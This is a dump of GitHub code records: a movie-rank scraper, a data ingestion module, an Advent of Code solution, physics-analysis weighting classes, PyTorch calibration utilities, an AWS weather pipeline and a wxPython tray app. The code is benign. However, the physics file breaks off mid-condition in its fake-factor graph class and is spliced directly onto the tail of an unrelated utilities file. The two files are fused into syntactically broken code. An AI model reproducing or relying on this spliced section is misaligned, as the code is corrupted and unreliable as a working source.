+{"seq_id": "11458725479", "text": "from bs4 import BeautifulSoup\nimport requests\n\n\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('https://movie.naver.com/movie/sdb/rank/rmovie.nhn?sel=pnt&date=20190909',headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\n# select를 이용해서, tr들을 불러오기\nmovies = soup.select('#old_content > table > tbody > tr')\n\n# soup.select('input[type=\"checkbox\"]')\n\n# movies (tr들) 의 반복문을 돌리기\n\nnum = 0\nfor movie in movies:\n # movie 안에 a 가 있으면,\n\n a_tag = movie.select_one('td.title > div > a')\n rank = movie.select_one('td.point')\n\n if a_tag is not None:\n # a의 text를 찍어본다.\n num += 1\n # print(a, end=' ')\n print(num, a_tag.text, rank.text)\n\n\n\n", "repo_name": "hanrimJO/sparta", "sub_path": "crawling.py", "file_name": "crawling.py", "file_ext": "py", "file_size_in_byte": 855, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "6992209129", "text": "import os, os.path\nimport time, datetime\n# os.chdir(os.path.join(os.getcwd(),'src')) if os.path.basename(os.getcwd())!='src' else None\nimport pandas as pd\nimport numpy as np\nfrom src.utils.tools import db\nfrom src.projects.dima.tabletools import table_create, sql_command, tablecheck\nfrom src.projects.tall_tables.talltables_handler import ingesterv2\nfrom src.projects.dima.tabletools import table_create, tablecheck\nfrom src.projects.aero.aero_model import update_model\n\n\"\"\"\nX 1.read directory that holds outputs\nX 2.concatenate dataframe\nX 2.5 Plotid\n3.choose model_run_id / ModelRunKey\n- for now modelrun lookup + modeloutputs will be in dima db\n\n4. check if lookuptable exists +\n check if model run id exists +\n update modelrun lookup table with appropriate id\n4.update model_run + model run loookup table on postgres\n\"\"\"\n# p = r\"C:\\Users\\kbonefont\\Desktop\\aero_flux_2\"\n# df = txt_read(p)\n# df['Source'] = 'AIM'\n# df\n# table_create(df, \"aero_runs\", \"aero\")\ndef txt_read(path):\n df_dict = {}\n testset = [\"20184145384203B2_flux\",\"20184145384203B1_flux\",\"20184145374203B2_flux\"]\n count = 1\n for i in os.listdir(path):\n #if file is not an excelfile\n if os.path.splitext(i)[1]!=\".xlsx\":\n # debug block\n # if os.path.splitext(i)[0] in [i for i in testset]:\n # file = os.path.join(path,i)\n # created_time = os.path.getctime(file)\n # parsed_ctime = time.ctime(created_time)\n # date_ctime = datetime.datetime.strptime(parsed_ctime, \"%a %b %d %H:%M:%S %Y\")\n # # print(date_ctime)\n # complete = os.path.join(path,i)\n # temp = pd.read_table(complete, sep=\"\\t\", low_memory=False)\n # df_dict.update({f\"df{count}\":temp})\n # count+=1\n\n # get date/time for modelrun\n file = os.path.join(path,i)\n created_time = os.path.getctime(file)\n parsed_ctime = time.ctime(created_time)\n date_ctime = datetime.datetime.strptime(parsed_ctime, \"%a %b %d %H:%M:%S %Y\")\n # get plotid\n plotid = i.split('_')[0]\n complete = os.path.join(path,i)\n temp = pd.read_table(complete, sep=\"\\t\", low_memory=False)\n temp['PlotId'] = plotid\n df_dict.update({f\"df{count}\":temp})\n # print(f\"{count} added\")\n count+=1\n else:\n pass\n return pd.concat([d[1] for d in df_dict.items()],ignore_index=True)\n\n\n\ndef model_run_updater(batchpath, modelrunkey, source = None):\n \"\"\"\n 1. creates a table in postgres with supplied dataframe\n 2. 
appends data to postgres table\n \"\"\"\n d = db(\"aero\")\n df = txt_read(batchpath)\n if source!=None:\n df['Source'] = source\n else:\n pass\n df['ModelRunKey'] = modelrunkey\n\n if tablecheck('aero_runs'):\n print('aero_runs exists, skipping table creation')\n update_model(batchpath,modelrunkey)\n\n ingesterv2.main_ingest(df, \"aero_runs\", d.str,100000)\n else:\n print('creating aero_runs table..')\n table_create(df, \"aero_runs\", \"aero\")\n update_model(batchpath,modelrunkey)\n ingesterv2.main_ingest(df, \"aero_runs\", d.str,100000)\n\n\ndef model_run_create():\n pass\n\ntype_translate = {np.dtype('int64'):'int',\n 'Int64':'int',\n np.dtype(\"object\"):'text',\n np.dtype('datetime64[ns]'):'timestamp',\n np.dtype('bool'):'boolean',\n np.dtype('float64'):'float(5)',}\n\nfields_dict = {\n\"ModelRunKey\":pd.Series([],dtype='object'),\n\"Model\":pd.Series([],dtype='object'),\n\"LocationType\":pd.Series([],dtype='object'),\n\"SurfaceSoilSource\":pd.Series([],dtype='datetime64[ns]'),\n\"MeteorologicalSource\":pd.Series([],dtype='object'),\n\"ModelRunNotes\":pd.Series([],dtype='object'),\n}\n", "repo_name": "krstphrrr/ingesterv2", "sub_path": "src/projects/aero/aero.py", "file_name": "aero.py", "file_ext": "py", "file_size_in_byte": 3744, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.getctime", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "time.ctime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pandas.read_table", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 63, "usage_type": "call"}, {"api_name": "src.utils.tools.db", "line_number": 72, "usage_type": "call"}, {"api_name": "src.projects.dima.tabletools.tablecheck", "line_number": 80, "usage_type": "call"}, {"api_name": "src.projects.aero.aero_model.update_model", "line_number": 82, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2.main_ingest", "line_number": 84, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2", "line_number": 84, "usage_type": "name"}, {"api_name": "src.projects.dima.tabletools.table_create", "line_number": 87, "usage_type": "call"}, {"api_name": "src.projects.aero.aero_model.update_model", "line_number": 88, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2.main_ingest", "line_number": 89, "usage_type": "call"}, {"api_name": "src.projects.tall_tables.talltables_handler.ingesterv2", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.dtype", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 98, 
"usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "1219552527", "text": "from queue import LifoQueue\nfrom typing import Dict, List, Tuple\n\nlines: List[str] = []\nwith open(\"input.txt\", mode=\"rt\") as inputfile:\n lines = [i.strip() for i in inputfile.readlines()]\n\nmatching: Dict[str, str] = {\"{\": \"}\", \"[\": \"]\", \"<\": \">\", \"(\": \")\"}\nillegal: Dict[str, int] = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\nsyntax_errors: List[Tuple[str, str, str]] = []\n\nillegal_sum: int = 0\nfor line_idx, line in enumerate(lines):\n q: LifoQueue[str] = LifoQueue()\n has_error: bool = False\n for c_idx, c in enumerate(line):\n if c in matching.keys():\n q.put_nowait(c)\n else:\n r = q.get_nowait()\n if c != matching[r]:\n has_error = True\n illegal_sum += illegal[c]\n se = (f\"SYNTAX ERROR [{line_idx}] at [{c_idx}]:\", f\"expected {matching[r]} but found {c} instead\", line)\n syntax_errors.append(se)\n\n # remaining_qsize = q.qsize()\n # remainder: str = \"\"\n # while True:\n # try:\n # remainder += q.get_nowait()\n # except Empty:\n # break\n # if not has_error:\n # print(f\"line [{line_idx}] has [{remaining_qsize}] elements remaining: {remainder}\")\n\nprint(illegal_sum)\n\nwith open(\"result.txt\", mode=\"wt\") as result:\n result.write(f\"syntax error score: {illegal_sum}\")\n\nwith open(\"output.txt\", mode=\"wt\") as outfile:\n for se in syntax_errors:\n outfile.write(\" \".join(se))\n outfile.write(\"\\n\")\n", "repo_name": "seldonPlan/advent_of_code", "sub_path": "2021/10/a/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 1474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 10, "usage_type": "name"}, {"api_name": "queue.LifoQueue", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "8994545692", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nObjWeights.py: \nweights applied \nto single objects\n\"\"\"\n\n#import fnmatch\n#import os\n#import sys\nfrom math import sqrt\nfrom array import array\n# logging\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n# ROOT\nimport ROOT\nimport metaroot\n\n# pyframe\nimport pyframe\n\n# pyutils\nimport rootutils\n\nimport mcutils\n\nGeV = 1000.0\n\n#------------------------------------------------------------------------------\nclass MuAllSF(pyframe.core.Algorithm):\n \"\"\"\n Single muon reco efficiency\n \"\"\"\n #__________________________________________________________________________\n def __init__(self, name=\"MuAllSF\",\n mu_index = None,\n #mu_level = None,\n key = None,\n scale = None,\n ):\n pyframe.core.Algorithm.__init__(self, name=name)\n self.mu_index = mu_index\n #self.mu_level = mu_level\n self.key = key\n self.scale = scale\n\n assert key, \"Must provide key for storing mu iso sf\"\n \n #_________________________________________________________________________\n def initialize(self): \n pass\n \"\"\"\n self.reco_levels = {\"Loose\":\"Loose\", \"Medium\":\"Loose\", \"Tight\":\"Loose\"}\n self.iso_levels = {\"Loose\":\"Loose\", \"Medium\":\"FixedCutLoose\", \"Tight\":\"FixedCutTightTrackOnly\"}\n self.ttva_levels = {\"Loose\": None, \"Medium\": None, \"Tight\": None}\n\n self.mu_levels = [\"Loose\", \"Medium\", \"Tight\"]\n if self.mu_level.startswith(\"Not\"):\n self.mu_levels.remove(self.mu_level.replace(\"Not\",\"\"))\n else:\n assert self.mu_level in self.mu_levels, \"ERROR: mu_level %s not recognised!!!\" % self.lead_mu_level\n self.mu_levels = [self.mu_level]\n \"\"\"\n \n #_________________________________________________________________________\n def execute(self, weight):\n sf=1.0\n if \"mc\" in self.sampletype: \n muons = self.store['muons']\n muon = muons[self.mu_index]\n \n if muon.isTruthMatchedToMuon:\n \n sf *= getattr(muon,\"_\".join([\"RecoEff\",\"SF\",\"Loose\"])).at(0)\n sf *= getattr(muon,\"_\".join([\"TTVAEff\",\"SF\"])).at(0)\n \n if getattr(muon,\"isIsolated_FixedCutTightTrackOnly\"):\n sf *= getattr(muon,\"_\".join([\"IsoEff\",\"SF\",\"FixedCutTightTrackOnly\"])).at(0)\n #elif getattr(muon,\"isIsolated_FixedCutLoose\"):\n # sf *= getattr(muon,\"_\".join([\"IsoEff\",\"SF\",\"FixedCutLoose\"])).at(0)\n elif getattr(muon,\"isIsolated_Loose\"):\n sf *= getattr(muon,\"_\".join([\"IsoEff\",\"SF\",\"Loose\"])).at(0)\n else: pass\n\n if self.scale: pass\n\n if self.key: \n self.store[self.key] = sf\n return True\n\n#------------------------------------------------------------------------------\nclass MuFakeFactorHist(pyframe.core.Algorithm):\n \"\"\"\n Applies the fake-factors to muon pairs\n \"\"\"\n #__________________________________________________________________________\n def __init__(self, name=\"MuFakeFactor\",config_file=None,mu_index=None,key=None,scale=None):\n pyframe.core.Algorithm.__init__(self,name=name)\n self.config_file = config_file\n self.mu_index = mu_index\n self.key = key\n self.scale = scale\n \n assert mu_index in [0,1], \"ERROR: mu_index must be in [0,1,2]\"\n assert config_file, \"Must provide config file!\"\n assert key, \"Must provide key for storing fakefactor\"\n #_________________________________________________________________________\n def initialize(self):\n f = ROOT.TFile.Open(self.config_file)\n assert f, \"Failed to open fake-factor config file: %s\"%(self.config_file)\n\n h_ff = f.Get(\"h_ff\")\n 
assert h_ff, \"Failed to get 'h_ff' from %s\"%(self.config_file)\n \n self.h_ff = h_ff.Clone()\n self.h_ff.SetDirectory(0)\n f.Close()\n #_________________________________________________________________________\n def execute(self, weight):\n muons = self.store['muons']\n mu = muons[self.mu_index]\n #if not self.sampletype == \"datadriven\": continue\n #if self.sampletype == \"mc\": continue\n pt_mu = mu.tlv.Pt()/GeV \n \n ff_mu = 1.0\n eff_mu = 0.0\n \n ibin_mu = self.h_ff.GetXaxis().FindBin(pt_mu) \n assert ibin_mu, \"ERROR: pt bin for lead mu not found!!!\"\n \n # error bars are symmetric\n #if self.mu_index == 0: \n # The previous line caused a bug in the \n # application of the fake-factors to the\n # validation region with di-muons triggers\n \n ff_mu = self.h_ff.GetBinContent(ibin_mu)\n eff_mu = self.h_ff.GetBinError(ibin_mu)\n \n if self.scale == 'up': \n ff_mu +=eff_mu\n if self.scale == 'dn': \n ff_mu -=eff_mu\n \n if self.key: \n self.store[self.key] = ff_mu\n\n return True\n\n#------------------------------------------------------------------------------\nclass MuFakeFactorGraph(pyframe.core.Algorithm):\n \"\"\"\n Applies the fake-factors to muon pairs\n \"\"\"\n #__________________________________________________________________________\n def __init__(self, name=\"MuFakeFactor\",config_file=None,mu_index=None,key=None,scale=None):\n pyframe.core.Algorithm.__init__(self,name=name)\n self.config_file = config_file\n self.mu_index = mu_index\n self.key = key\n self.scale = scale\n \n assert mu_index in [0,1], \"ERROR: mu_index must be in [0,1]\"\n assert config_file, \"Must provide config file!\"\n assert key, \"Must provide key for storing fakefactor\"\n #_________________________________________________________________________\n def initialize(self):\n f = ROOT.TFile.Open(self.config_file)\n assert f, \"Failed to open fake-factor config file: %s\"%(self.config_file)\n\n g_ff = f.Get(\"g_ff_stat_sys\")\n assert g_ff, \"Failed to get 'g_ff' from %s\"%(self.config_file)\n \n self.g_ff = g_ff.Clone()\n f.Close()\n #_________________________________________________________________________\n def execute(self, weight):\n muons = self.store['muons']\n mu = muons[self.mu_index]\n #if not self.sampletype == \"datadriven\": continue\n #if self.sampletype == \"mc\": continue\n pt_mu = mu.tlv.Pt()/GeV \n \n for ibin_mu in xrange(1,self.g_ff.GetN()):\n edlow = self.g_ff.GetX()[ibin_mu] - self.g_ff.GetEXlow()[ibin_mu]\n edhi = self.g_ff.GetX()[ibin_mu] + self.g_ff.GetEXhigh()[ibin_mu]\n if pt_mu>=edlow and pt_mu 0 else 1.25e-3))\n\ndef fill_zeros_previous(arr):\n for i, r in enumerate(arr):\n if r.sum() == 0 and i > 0:\n arr[i] = arr[i-1]\n return arr\n \ndef remove_zero_labels(x, y):\n y = y[np.all(y != 0, axis=1)]\n x = x[np.where(np.any(y != 0, axis=1))[0]]\n return x, y\n \ndef split_data(img_paths, labels, split=0.90, transform=None, non_zero_labels=1, remove_nans=1):\n labels = np.nan_to_num(labels)\n \n if non_zero_labels:\n if remove_nans:\n img_paths, labels = remove_zero_labels(img_paths, labels)\n else:\n labels = fill_zeros_previous(labels)\n \n x_train, x_test, y_train, y_test = train_test_split(img_paths, labels, test_size=(1.0 - split), random_state=42)\n train_size = int(split * x_train.shape[0])\n x_valid, y_valid, x_train, y_train = x_train[train_size:], y_train[train_size:], x_train[:train_size], y_train[:train_size]\n\n train_data = CalibData(x_train, y_train, transform=transform)\n valid_data = CalibData(x_valid, y_valid)\n test_data = CalibData(x_test, y_test)\n \n 
return train_data, valid_data, test_data\n\ndef load_pretrained_model(model, weights_path):\n model.load_state_dict(torch.load(weights_path))\n return model\n\n\n\n\n", "repo_name": "asceznyk/calipy", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 17, "usage_type": "name"}, {"api_name": "torchvision.transforms.functional.resize", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms.functional", "line_number": 27, "usage_type": "name"}, {"api_name": "torchvision.transforms.functional.to_tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 62, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "22744948661", "text": "import click\nimport os\nimport time\nfrom decimal import Decimal\n\n# import watchtower\nimport datetime\nfrom src.common.common_helper import init_env, LOGGER, s3resource\nfrom src.common.Lineage import Lineage\nfrom src.creation.Creation import Creation\nfrom src.ingestion.Ingestion import Ingestion\nimport json\nfrom src.store.Store import Store\nfrom src.analize.Analize import Analize\n\n\ndef run_job_creation(aws_job_id: str, days) -> None:\n \"\"\"\n run the job ingestion process that access data from a weather API,\n insert it into a DynamoDB Database, and generate some queries\n over the data that are exported to a S3 bucket.\n\n aws_job_id: the job id to be executed\n days: the number of days of the data to be ingested from the weather API\n\n \"\"\"\n try:\n LOGGER.info(\"Creation Status Running\")\n start_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n with open(os.environ[\"ATTRIBUTES\"]) as json_attr:\n attr = json.load(json_attr)\n with open(os.environ[\"KEYSCHEMA\"]) as json_key_schema:\n key_schema = json.load(json_key_schema)\n with open(os.environ[\"PROVISION\"]) as json_provision:\n provisions = json.load(json_provision)\n create_table = Creation()\n\n create_table.process(\n table_name=os.environ[\"TABLE_LANDING\"],\n attributes=attr,\n schema=key_schema,\n provisions=provisions,\n )\n\n end_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n LOGGER.info(f\"CREATION FINISH SUCCESSFULLY AT {end_time}\")\n\n except Exception as e:\n LOGGER.info(\"Ingestion status Failed\")\n LOGGER.info(f\"{e}\")\n end_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n\n\ndef split_list(lst, n):\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\ndef run_job_ingestion_process(aws_job_id: str, days) -> None:\n \"\"\"\n run the job ingestion process that access data from a weather API,\n insert it into a DynamoDB Database, and generate some queries\n over the data that are exported to a S3 bucket.\n\n aws_job_id: the job id to be executed\n days: the number of days of the data to be ingested from the weather API\n\n \"\"\"\n try:\n LOGGER.info(\"Ingestion Status Running\")\n start_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n ingestion = Ingestion()\n record_list, output_df = ingestion.process(days)\n chunk_list = list(split_list(record_list, 25))\n store_item = Store()\n for i, chunk in enumerate(chunk_list):\n store_item.store_transaction(\n item=chunk,\n job_id=aws_job_id + \"_\" + str(i),\n PK=\"timezoneloc\",\n table=os.environ[\"TABLE_LANDING\"],\n )\n analize = Analize()\n path = f\"s3://{os.environ['REFINED']+'/'+os.environ['PATH_01']+'/'}\"\n result_query = analize.process(\n df=output_df, sql_path=str(os.environ[\"QUERY_MAX_TEMP_LOC\"])\n )\n analize.export(\n df=result_query, s3=s3resource, path=path, partition_cols=[\"date\"]\n )\n result_query_02 = analize.process(\n df=output_df, sql_path=str(os.environ[\"QUERY_STATS_DAY\"])\n )\n path = f\"s3://{os.environ['REFINED']+'/'+os.environ['PATH_02']+'/'}\"\n analize.export(\n df=result_query_02,\n s3=s3resource,\n path=path,\n partition_cols=[\"locationtime\"],\n )\n end_time = datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n LOGGER.info(f\"PROCESS END TO END FINISH SUCCESSFULLY AT {end_time}\")\n\n except Exception as e:\n LOGGER.info(\"END TO END status Failed\")\n LOGGER.error(f\"END TO END status Failed {e}\")\n LOGGER.info(f\"{e}\")\n end_time = 
datetime.datetime.now().time().strftime(\"%H:%M:%S\")\n\n\n@click.command()\n@click.option(\"--overwrite\", help=\"True, False\", required=False)\n@click.option(\"--days\", help=\"int value from 1 to n\", required=True)\n@click.option(\"--aws_job_id\", help=\"The current Job ID\")\n@click.option(\"--job\", help=\"creation_job, ingestion_process_job\", required=True)\n# @click.option(\"--job\", help=\"Job name \")\n\n\n@click.option(\n    \"--env\",\n    default=\"prod\",\n    help=\"'dev' for development, 'prod' for production environment\",\n)\ndef main(job, overwrite, days, env, aws_job_id):\n    start = time.time()\n    # os.environ[\"OVERWRITE_DATA\"] = overwrite or \"False\"\n    days = days or 5\n    init_env(env)\n    # Add Handler to cloudwatch logs\n    # LOGGER.addHandler(\n    #     watchtower.CloudWatchLogHandler(log_group=os.environ[\"CLOUDWATCH_LOG_GROUP\"])\n    # )\n    LOGGER.info(f\"Job: {job} {aws_job_id}\")\n    LOGGER.info(f\"Overwrite files: {overwrite}\")\n    LOGGER.info(\"Execution Days: {0}\".format(days))\n    jobname = \"-\".join([env, str(days), aws_job_id])  # str() keeps the join safe when days falls back to the int default\n    os.environ[\"AWS_BATCH_JOB_ID\"] = aws_job_id\n    LOGGER.info(f\"Starting a job: {jobname}\")\n    # Start a job\n    function_dict = {\n        \"creation_job\": run_job_creation,\n        \"ingestion_process_job\": run_job_ingestion_process,\n        # \"processing_job\": run_job_processing,\n        # \"analize_job\": run_job_analyzing,\n    }\n    # job_function = function_dict.get(\"creation_job\")\n    # job_function(aws_job_id, days)\n    job_function = function_dict.get(job)\n    job_function(aws_job_id, days)\n\n\nif __name__ == \"__main__\":\n    # allows setting the aws access key\n    main(auto_envvar_prefix=\"X\")\n", "repo_name": "wilisumo/weather_data_pipeline", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "src.common.common_helper.LOGGER.info", "line_number": 28, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 28, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "src.creation.Creation.Creation", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 39, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 46, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 46, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 49, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 49, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 50, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 50, "usage_type": "name"}, {"api_name": 
"datetime.datetime.now", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 70, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 70, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "attribute"}, {"api_name": "src.ingestion.Ingestion.Ingestion", "line_number": 72, "usage_type": "call"}, {"api_name": "src.store.Store.Store", "line_number": 75, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 81, "usage_type": "attribute"}, {"api_name": "src.analize.Analize.Analize", "line_number": 83, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.s3resource", "line_number": 89, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.s3resource", "line_number": 97, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 102, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 102, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 105, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 105, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.error", "line_number": 106, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 106, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 107, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 107, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "src.common.common_helper.init_env", "line_number": 128, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 133, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 133, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 134, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 134, "usage_type": "name"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 135, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 135, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 137, "usage_type": "attribute"}, {"api_name": "src.common.common_helper.LOGGER.info", "line_number": 138, "usage_type": "call"}, {"api_name": "src.common.common_helper.LOGGER", "line_number": 138, "usage_type": "name"}, {"api_name": "click.command", "line_number": 111, "usage_type": "call"}, {"api_name": "click.option", "line_number": 112, "usage_type": "call"}, {"api_name": "click.option", 
"line_number": 113, "usage_type": "call"}, {"api_name": "click.option", "line_number": 114, "usage_type": "call"}, {"api_name": "click.option", "line_number": 115, "usage_type": "call"}, {"api_name": "click.option", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "29305710713", "text": "# Chapter 4: Containers and Advanced Controls\r\n# Recipe 8: Building a system tray application\r\n#\r\nimport urllib\r\nimport json\r\nimport wx\r\n\r\nID_GET_CITY = wx.NewId()\r\n\r\nclass WeatherTray(wx.TaskBarIcon):\r\n def __init__(self):\r\n super(WeatherTray, self).__init__()\r\n self.data = { 'desc' : \"Unknown\", 'temp' : \"??\" }\r\n self.UpdateData(\"London,UK\")\r\n self.Bind(wx.EVT_MENU, self.OnMenu)\r\n\r\n def UpdateData(self, city):\r\n src = \"http://api.openweathermap.org/data/2.5/weather?q=%s\"\r\n try:\r\n formatted = city.replace(' ', \"%20\")\r\n url = urllib.urlopen(src % formatted)\r\n j = json.load(url)\r\n\r\n weather = j['weather'][0]\r\n temp = j['main']['temp']\r\n self.data = dict()\r\n self.data['desc'] = weather['main']\r\n self.data['icon'] = weather['icon']\r\n c = float(temp) - 273.15\r\n self.data['temp'] = c\r\n \r\n self.city = city\r\n self.UpdateIcon()\r\n except:\r\n pass\r\n\r\n def UpdateIcon(self):\r\n img = None\r\n 